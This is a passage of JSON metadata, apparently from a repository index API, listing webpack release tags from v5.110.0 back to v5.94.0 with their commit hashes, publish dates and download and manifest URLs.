.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"co